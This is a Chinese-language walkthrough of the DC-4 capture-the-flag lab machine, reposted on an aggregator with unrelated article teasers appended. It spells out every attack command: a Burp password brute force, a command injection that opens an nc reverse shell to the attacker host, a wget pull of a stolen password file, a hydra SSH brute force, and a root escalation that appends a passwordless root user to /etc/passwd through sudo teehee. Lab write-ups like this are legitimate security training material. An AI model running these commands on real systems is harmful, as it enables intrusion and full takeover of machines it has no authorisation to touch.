DC-4 靶机

news2024/12/19 0:20:02

DC_4

信息搜集

存活检测

image-20231022204049659

详细扫描

image-20231022204104264

后台网页扫描

image-20231022204121041

网页信息搜集

image-20231022204148961

只有一个登陆界面

漏洞利用

  • 尝试使用 burpsuite 密码爆破

    尝试使用用户名 admin 登录管理员页面

  • 成功爆破出密码 happy

    image-20231022205656115

  • 登录管理员页面

    显示可以使用命令

    image-20231022205749930

  • 但只能使用三个命令

    image-20231022205835140

  • 继续使用 bp 拦截查看数据包

    发送到 Repeater 中进行调试

    image-20231022210030615

  • 可以观察到列出当前文件的指令铭文显示在 POST 传参中

    查看命令本应为 ls -l 而参数中的命令为 ls+-1,猜测此处应该使用 + 代替了空格

  • 尝试将命令修改为连接反弹 shell 的 命令

  • kali 开启 nc 监听

    nc -lvvp 7777
    
  • 将抓取的命令修改为

    nc+-e+/bin/bash+10.4.7.146+7777
    

    image-20231022210941206

  • 成功反弹

    image-20231022210959775

ssh 密码爆破

  • 搜集有用信息

    在/home/jim/backups 目录下发现了旧密码文件

    image-20231022211410659

  • 将密码文件保存

  • 靶机开启 http 上传

    python3 -m http.server 8888
    

    image-20231022211612326

  • kali 下载旧密码文件

    wget http://10.4.7.148:8888/old-passwords.bak
    

    image-20231022211648896

  • hydra 密码爆破

    hydra -l jim -P old-passwords.bak ssh://10.4.7.148 -vV -f -I
    
  • 成功爆破出 jim 的密码 jibril04

  • 登录

    ssh jim@10.4.7.148
    

    image-20231022212144918

提权

  • 尝试 sudo -l

    无 root 权限

    image-20231022212312307

  • 返回查看到登陆后收到了一封邮件

    image-20231022212630510

  • 查看邮箱

    image-20231022212730316

  • 邮箱是 Charles 发来的,并告知了他的密码 ^xHhA&hvim0y

  • 切换用户

  • 成功切换,sudo -l 查看权限

    image-20231022212947507

  • 可以使用 teehee 命令

  • 查看 teehee 命令的使用方式

    teehee --help
    

    image-20231022213311584

  • 帮助中显示使用 teehee -a <文件> 可以向文件中追加内容

  • 尝试向 /etc/passwd 文件中追加一条 root 用户

    sudo /usr/bin/teehee -a /etc/passwd 
    
    nb::0:0:root:/root:/bin/bash
    

    image-20231022213936715

  • 切换创建的用户

    su nb
    

    image-20231022214009533

    成功获取 root 权限

总结

  • burpsuite 网页登录爆破
  • burpsuite 拦截修改数据包
  • hydra 爆破 ssh 密码
  • sudo 提权
  • 向 /etc/passwd 文件添加 root 用户

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1121895.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【C++】VS2019,关于scanf等的报错及其解决方案

参考资料&#xff1a;B站袁春旭老师的网课 报错一&#xff1a;this function may be unsafe. Consider using scanf_s instead. 如下图 这种错误是因为SDL检查不通过&#xff0c;默认这个检查是开的&#xff0c;如下图&#xff0c; 解决方案&#xff1a;把这个SDL检查关闭即…

5、k8s部署Nginx Proxy Manager

前言 Nginx-Proxy-Manager 是一个基于 Web 的 Nginx 服务器管理工具&#xff0c;它允许用户通过浏览器界面轻松地管理和监控 Nginx 服务器。通过 Nginx-Proxy-Manager&#xff0c;可以获得受信任的 SSL 证书&#xff0c;并通过单独的配置、自定义和入侵保护来管理多个代理。用…

51单片机KeyWard

eg1&#xff1a; 单片机键盘的分类 键盘分为编码键盘和非编码键盘&#xff0c;键盘上闭合键的识别由专用的硬件编码器实现&#xff0c;并产生键编码号或键值得称为编码键盘&#xff0c;如计算机键盘&#xff0c;而靠软件来识别的称为非编码键盘&#xff0c;在单片机组成的各种…

Python数字类型

目录 目标 版本 种类 官方文档 数据运算方法 常用函数 转整数 转浮点数 转绝对值 四舍五入 进制转换 math模块常用函数 目标 掌握Python两种数据类型的使用方法。 版本 Python 3.12.0 种类 数字类型有三种&#xff0c;分别是&#xff1a; 整数&#xff08;int&…

C++类和对象(五) 拷贝构造函数

1 概念 在现实生活中&#xff0c;可能存在一个与你一样的自己&#xff0c;我们称其为双胞胎。那在创建对象时&#xff0c;可否创建一个与已存在对象一某一样的新对象呢&#xff1f; 那在创建对象时&#xff0c;可否创建一个与已存在对象一某一样的新对象呢&#xff1f; 拷贝构造…

Linux高性能编程学习-TCP/IP协议族

一、TCP/IP协议族结构与主要协议 分层&#xff1a;数据链路层、网络层、传输层、应用层 1. 数据链路层 功能&#xff1a;实现网卡驱动程序&#xff0c;处理数据在不同物理介质的传输 协议&#xff1a; ARP&#xff1a;将目标机器的IP地址转成MAC地址RARP&#xff1a;将MAC地…

【Java基础面试四十五】、 介绍一下泛型擦除

文章底部有个人公众号&#xff1a;热爱技术的小郑。主要分享开发知识、学习资料、毕业设计指导等。有兴趣的可以关注一下。为何分享&#xff1f; 踩过的坑没必要让别人在再踩&#xff0c;自己复盘也能加深记忆。利己利人、所谓双赢。 面试官&#xff1a;介绍一下泛型擦除 参考…

2023年10月小程序云开发cms内容管理无法使用,无法同步内容模型到云开发数据库的解决方案

一&#xff0c;问题描述 最近越来越多的同学找石头哥&#xff0c;说cms用不了&#xff0c;其实是小程序官方最近又搞大动作了&#xff0c;偷偷的升级的云开发cms&#xff08;内容管理&#xff09;以下都称cms&#xff0c;不升级不要紧&#xff0c;这一升级&#xff0c;就导致我…

【Matlab】三维绘图函数汇总

本文用于汇总 Matlab 中的三维绘图函数。plot3() 函数用于绘制用参数方程表示的三维曲线。ezplot3() 函数用于三维曲线的符号绘图&#xff0c;需要用参数方程表示。mesh() 函数用于绘制三维曲面网格。surf() 函数用于绘制三维空间曲面。 目录 1. plot3() 2. ezplot3() 3. me…

中医理疗中药材经营小程序商城的作用是什么

对消费者而言&#xff0c;能找到一家靠谱的中医养生馆很重要&#xff0c;但如非朋友介绍或恰好看到纸质广告等&#xff0c;仅依赖线下跑腿很难找到合适的门店&#xff0c;同时也很费时费力。 同时购买相关产品&#xff0c;也只能前往实体店购买或线上第三方商城&#xff0c;当…

【29】c++设计模式——>策略模式

策略模式 C中的策略模式&#xff08;Strategy Pattern&#xff09;是一种行为型设计模式&#xff0c;它允许在运行时选择算法的行为。策略模式通过将算法封装成独立的类&#xff0c;并且使它们可以互相替换&#xff0c;从而使得算法的变化独立于使用算法的客户端。 策略模式通…

2.3.C++项目:网络版五子棋对战之实用工具类模块的设计

文章目录 一、实用工具类模块&#xff08;一&#xff09;功能 二、设计和封装&#xff08;一&#xff09;日志宏封装&#xff08;二&#xff09;mysql_util封装&#xff08;三&#xff09;Jsoncpp-API封装&#xff08;四&#xff09;file_util封装&#xff08;五&#xff09;st…

Linux:实用操作

Linux&#xff1a;实用操作 1. 各类小技巧1.1 controlc(ctrl c) 强制停止1.2 可以通过快捷键&#xff1a;control d(ctrl d)&#xff0c;退出账户的登录1.3 历史命令搜索1.4 光标移动快捷键 2. 软件安装2.1 介绍2.2 yum命令(需要root权限)在这里插入图片描述 3. systemctl4.…

【C++11】函数的可变参数模板

文章目录 一. 为什么要有可变参数模板&#xff1f;二. 什么是可变参数模板&#xff1f;三. 如何展开参数包&#xff1f;1. 递归函数方式展开参数包2. 通过初始化列表展开参数包 一. 为什么要有可变参数模板&#xff1f; C98/03 中的模板为能够实现泛型编程提供了便利&#xff…

购买腾讯云服务器如何领取优惠券?

随着云计算技术的不断发展&#xff0c;越来越多的个人和企业开始选择云服务器作为其业务发展的基础。作为国内领先的云计算服务商&#xff0c;腾讯云服务器以其稳定、安全、灵活的特点&#xff0c;受到了广大用户的青睐。为了更好地回馈用户&#xff0c;腾讯云服务器经常会推出…

C++ 类和对象(六)赋值运算符重载

1 运算符重载 C为了增强代码的可读性引入了运算符重载&#xff0c;运算符重载是具有特殊函数名的函数&#xff0c; 也具有其返回值类型&#xff0c;函数名字以及参数列表&#xff0c;其返回值类型与参数列表与普通的函数类似。 函数名字为&#xff1a;关键字operator后面接需…

并发编程-Java内存模型

Java内存模型 在并发编程中&#xff0c;需要处理的两个关键问题&#xff1a; 1&#xff09;多线程之间如何通信&#xff08;线程之间以何种机制来交换数据&#xff09; 2&#xff09;多线程之间如何同步&#xff08;控制不同线程间操作发生的相对顺序&#xff09; 线程之间…

AMD移动FP5平台时序解释

由于刚开始接触AMD移动平台,难免有错误;如有错误请指出共同进步。 配置如下: APU:FP5 Processor EC: ITE5570 CorePMU:RT3662AC 一、基本知识概括 1、IC pin脚信号解释 (1)一般OK是外部信号(对于IC来说是Input);PG是IC发出的(对于IC来说是Output);AMD开机:EN---…

存储优化知识复习三详细版解析

存储优化 知识复习三 一、 选择题 1、 数据库领域的三位图灵奖得主是( )。 A、C.W.Bachman B、E.F.Codd C、Peter Naur D、James Gray 【参考答案】ABD2、 数据库DB、数据库系统DBS、数据库管理系统DBMS三者之间得关系是&#xff08; &#xff09;。 A、&#xff24;B&#…

linux性能分析(四)性能优化导轮

一 别再让Linux性能问题成为你的绊脚石 ① 学习历程 备注&#xff1a; 跟我的学习经历很相像刚工作时遇到的场景跟我现在一样,深深的无力感驱使我继续前行目标: 性能优化成为我的肌肉记忆,写代码的潜意识 ... ② 常见的问题 ③ 性能问题为什么这么难呢 思考&#xff1a…